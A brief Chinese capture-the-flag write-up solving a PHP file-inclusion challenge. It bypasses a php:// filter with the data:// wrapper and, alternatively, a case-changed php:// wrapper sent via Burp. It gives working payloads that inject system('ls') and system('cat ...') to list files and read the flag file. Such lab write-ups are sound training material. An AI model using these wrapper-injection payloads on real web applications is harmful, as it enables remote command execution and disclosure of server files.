首先看到如下
发现php://被过滤,可以用data伪协议,构造一个payload:
?page=data://text/plain,<?%20system(%27ls%27);?>
接着payload
?page=data://text/plain,<?%20system(%27cat%20fl4gisisish3r3.php%27);?>
然后再查看器里看到flag
这道题也可以用burp抓包来解决,由于php://过滤,可以大小写绕过,然后post
<? system('ls');?>
这里我也不知道为什么去掉php就可以,没去掉上传不了